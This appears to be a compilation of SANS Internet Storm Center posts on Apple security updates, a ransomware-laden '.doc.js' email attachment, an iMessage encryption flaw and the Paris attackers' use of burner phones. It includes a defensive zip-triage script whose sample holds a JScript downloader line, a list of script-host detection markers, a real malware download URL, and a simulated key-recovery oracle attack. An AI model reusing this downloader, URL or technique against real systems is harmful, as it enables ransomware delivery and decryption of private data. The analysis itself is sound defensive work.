(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

As part of today's product announcements, Apple released new operating systems across its product lines. In addition to new features, these updates address a number of security issues.

OS X Server 5.1 ( for Yosemite 10.10.5 )

This update improves the warning shown when an administrator stores backups insecurely and removes old SSL ciphers (RC4). It also addresses authentication bypass issues in the Wiki server.

Safari 9.1

The Safari update is available for OS X back to 10.9 (Mavericks). It fixes a total of 12 vulnerabilities, some of which can be used to execute arbitrary code.

OS X El Capitan 10.11.4 (Security Update 2016-002)

A total of 59 vulnerabilities are patched (I hope I counted them right). Here are some of the highlights:

Apple USB Networking (CVE-2016-1734): This vulnerability could lead to arbitrary code execution if a malicious USB device is connected to the computer.

Bluetooth (CVE-2016-1735/1736): Bluetooth can be used to execute arbitrary code. It isn't clear (but likely) that you first need to pair with the device, which would mitigate the problem somewhat.

Messages (CVE-2016-1788): This vulnerability, which would allow the interception of iMessage messages, has gotten a lot of press in the last couple of days.

OpenSSH (CVE-2016-0777/0778): The roaming vulnerability, which could leak the client's private key to a malicious server, is fixed in this patch. On clients that cannot be updated yet, disabling the undocumented roaming feature in the client configuration (UseRoaming no) removes the exposure.

Wi-Fi (CVE-2016-0801/0802): A malicious Wi-Fi frame could be used to execute arbitrary code. Since this requires an unspecified ether type, I am assuming that the victim first has to associate with the network. But the advisory doesn't provide sufficient details to tell for sure.

Xcode 7.3:

One vulnerability in otool (a tool to display object files) and two in Subversion.

watchOS 2.2:

A lot of overlap here with the OS X and Safari patches. Note that the Watch is also vulnerable to the Wi-Fi issues, but not the Bluetooth ones.

iOS 9.3:

A total of 36 vulnerabilities, many of which are also patched in OS X. The Wi-Fi vulnerability applies to iOS just as it does to watchOS and OS X.

tvOS 9.2

Again a lot of overlap with the other updates.

In short: patch...

For details from Apple, please refer to the usual security bulletin page: https://support.apple.com/en-us/HT201222

Johannes B. Ullrich, Ph.D.


We got the following message from our reader Steven:

"Yesterday I received an email regarding STEVEN, Notice to Appear in Court on March 28 [...] the folder and scanned the .doc.js file with Avast, and it said there was no problem. So I double-clicked on the .doc.js file. Nothing happened. I then changed the file name, removing .js from the extension. I clicked on the file and it opened in Word. Upon seeing the mess of text letters, I became alarmed and then found your webpage."

I think the message makes some important points: Malicious spam does work. It just has to hit the right person. Just like Steven had a court appointment, others may be waiting for a shipping confirmation or for an airplane ticket they just booked. Attacks do not have to work every time; even a relatively small success rate is still a win for the attacker.

In this case, I ran the script in a Windows 8.1 virtual machine. Windows Defender blocked it (the only anti-malware I have on the system). The JavaScript then, as expected, downloaded crypto-ransomware. The ransomware renamed various files by adding the .crypted extension and went ahead encrypting them.

Anti-virus coverage was pretty decent for the unzipped attachment according to VirusTotal. But it looks like Steven's copy of Avast did let this sample slip past.
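The attachment in Steven's mail is the classic double-extension trick: a file named something like "...doc.js" is shown by Windows as a document, but a double-click hands it to the Windows Script Host, which then fetches the real payload. The following triage script is an added example and is not part of the original diary or of any vendor tool; it unpacks a zip attachment in memory and flags members whose real extension is a Windows script or executable, especially when a decoy document extension precedes it, and it peeks at the content for script-host markers so that a renamed file does not slip through. The extension lists, the marker strings and the sample zip are all constructed for illustration.

```python
"""Triage a zip attachment for Windows script payloads hiding behind a
document-looking double extension (e.g. Notice_to_Appear.doc.js)."""
import io
import zipfile

# Extensions the Windows shell hands to the script host or executes directly.
# Assumption: this list is illustrative, not exhaustive.
EXECUTABLE_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "scr",
                   "exe", "bat", "cmd", "ps1", "lnk"}
# Decoy document extensions attackers place in front of the real one.
DECOY_EXTS = {"doc", "docx", "pdf", "xls", "xlsx", "txt", "jpg", "png", "rtf"}


def classify_name(name):
    """Return the reasons (possibly none) a file name looks like a disguised script."""
    reasons = []
    base = name.rsplit("/", 1)[-1]          # drop any directory inside the zip
    parts = base.lower().split(".")
    if len(parts) < 2:
        return reasons
    real_ext = parts[-1]
    if real_ext in EXECUTABLE_EXTS:
        reasons.append("executable extension ." + real_ext)
        if len(parts) >= 3 and parts[-2] in DECOY_EXTS:
            reasons.append("decoy document extension ." + parts[-2]
                           + " before ." + real_ext)
    return reasons


def looks_like_script(data):
    """Heuristic content check: script text rather than a real Office document.
    Legacy .doc files start with the OLE2 magic d0cf11e0; .docx is a zip (PK)."""
    head = data[:8]
    if head.startswith(b"\xd0\xcf\x11\xe0") or head.startswith(b"PK\x03\x04"):
        return False
    try:
        text = data[:4096].decode("ascii")
    except UnicodeDecodeError:
        return False
    # Constructed marker list: objects a JScript downloader typically touches.
    markers = ("ActiveXObject", "WScript", "eval(", "MSXML2",
               "ADODB.Stream", "String.fromCharCode")
    return any(m in text for m in markers)


def triage_zip(blob):
    """Return {member_name: [reasons]} for every suspicious member of a zip blob."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify_name(info.filename)
            if looks_like_script(zf.read(info.filename)):
                reasons.append("content contains Windows Script Host markers")
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_attachment():
    """Constructed sample zip resembling the reader's mail; not the real attachment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Notice_to_Appear.doc.js",
                    'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
                    'x.open("GET", "http://example.invalid/counter/", false);\n')
        zf.writestr("readme.txt", "Nothing to see here.\n")
        zf.writestr("real.doc", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in triage_zip(build_sample_attachment()).items():
        print(member, "->", "; ".join(why))
```

Running it on the constructed sample flags only Notice_to_Appear.doc.js, for all three reasons; the decoy .txt and the genuine OLE2 .doc pass. Note that renaming the file, as Steven did, changes what the name check sees but not what the content check sees, which is why both are combined.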

Doing a quick analysis of the PCAP, it looks like the actual malware was downloaded from

http://wambofantacalcio.it / counter/?ad=1N....[long string]dc=[6 digit number]

Anti-virus coverage on the binary is mixed, with Symantec identifying it as Cryptolocker.

Johannes B. Ullrich, Ph.D.


Apple's widely used iMessage communications platform contains a currently unpatched flaw that allowed attackers to decrypt a photo stored on the company's iCloud backup system, according to an article published by The Washington Post.

The vulnerability was discovered by a team of researchers from Johns Hopkins University. According to the Post, the researchers were able to exploit the bug by mimicking an Apple server and then painstakingly chipping away at the encryption protecting the photo, which was sent as a link over iMessage. They eventually were able to obtain the encryption key used to protect the photo by guessing each of its underlying 64 digits in what's known as a brute-force attack.

The vulnerability came to light as the FBI is trying to force Apple to write software that defeats security features built into an iPhone used by one of the San Bernardino shooters. Apple, joined by many security and privacy advocates, has bitterly opposed the move and warned that such action can ultimately diminish the security of smartphones everywhere. This iMessage flaw is probably of little benefit to the FBI in pulling data from the iPhone of San Bernardino shooter Syed Rizwan Farook, who along with his wife took part in a shooting rampage that killed 14 people. Still, the bug underscores what security people have long known: cryptography is excruciatingly hard to get right, and common bugs often leave an opening for law enforcement agents and criminal hackers.
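"Guessing each of its underlying 64 digits" only works because the attacker could confirm guesses one digit at a time; a 64-hex-digit key has 16^64 possibilities, which no brute force covers. The simulation below is an added illustration, not code from the article or the Johns Hopkins team, and its PrefixOracle is an assumption: a stand-in for any endpoint that accepts or rejects a partially correct key, which the article does not describe in detail. It shows the general principle that a per-position oracle collapses the cost from exponential to linear, which is why unauthenticated ciphertext is dangerous.

```python
"""Why 'guessing 64 digits' is feasible with a per-digit oracle and hopeless
without one.  PrefixOracle is a simulation (an assumption standing in for the
server behaviour the article does not detail), not iMessage's protocol."""
import secrets

HEX = "0123456789abcdef"
KEY_DIGITS = 64            # a 256-bit key written as 64 hex digits


class PrefixOracle:
    """Answers 'does this guess agree with the secret on its first len(guess) digits?'
    Any endpoint that behaves differently for a partially correct key leaks this."""

    def __init__(self, secret):
        self._secret = secret
        self.queries = 0        # count how much the attacker had to ask

    def prefix_ok(self, guess_prefix):
        self.queries += 1
        return self._secret.startswith(guess_prefix)


def recover_key(oracle, digits=KEY_DIGITS):
    """Digit-at-a-time recovery: at most len(HEX) queries per position."""
    known = ""
    for _ in range(digits):
        for d in HEX:
            if oracle.prefix_ok(known + d):
                known += d
                break
        else:                   # no digit matched: the oracle is lying
            raise RuntimeError("oracle inconsistent")
    return known


def worst_case_queries(digits=KEY_DIGITS, alphabet=len(HEX)):
    """Return (with_oracle, without_oracle) worst-case guess counts."""
    return digits * alphabet, alphabet ** digits


def demo():
    """Recover a fresh random key and report whether it matched and the query count."""
    secret = secrets.token_hex(32)          # 32 random bytes -> 64 hex digits
    oracle = PrefixOracle(secret)
    recovered = recover_key(oracle)
    return recovered == secret, oracle.queries


if __name__ == "__main__":
    matched, used = demo()
    linear, exponential = worst_case_queries()
    print("recovered:", matched, "queries:", used,
          "(worst case %d with an oracle, %d without)" % (linear, exponential))
```

The fix is not a longer key but removing the oracle: authenticating the ciphertext (a MAC or an AEAD mode) so that a tampered message is rejected outright and no partial-correctness signal ever reaches the attacker.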


New details of the Paris attacks carried out last November reveal that it was the consistent use of prepaid burner phones, not encryption, that helped keep the terrorists off the radar of the intelligence services.

As an article in The New York Times reports: "the three teams in Paris were comparatively disciplined. They used only new phones that they would then discard, including several activated minutes before the attacks, or phones seized from their victims."

The article goes on to give more details of how some phones were used only very briefly in the hours leading up to the attacks. For example: "Security camera footage showed Bilal Hadfi, the youngest of the assailants, as he paced outside the stadium, talking on a cellphone. The phone was activated less than an hour before he detonated his vest." The information comes from a 55-page report compiled by the French antiterrorism police for France's Interior Ministry.
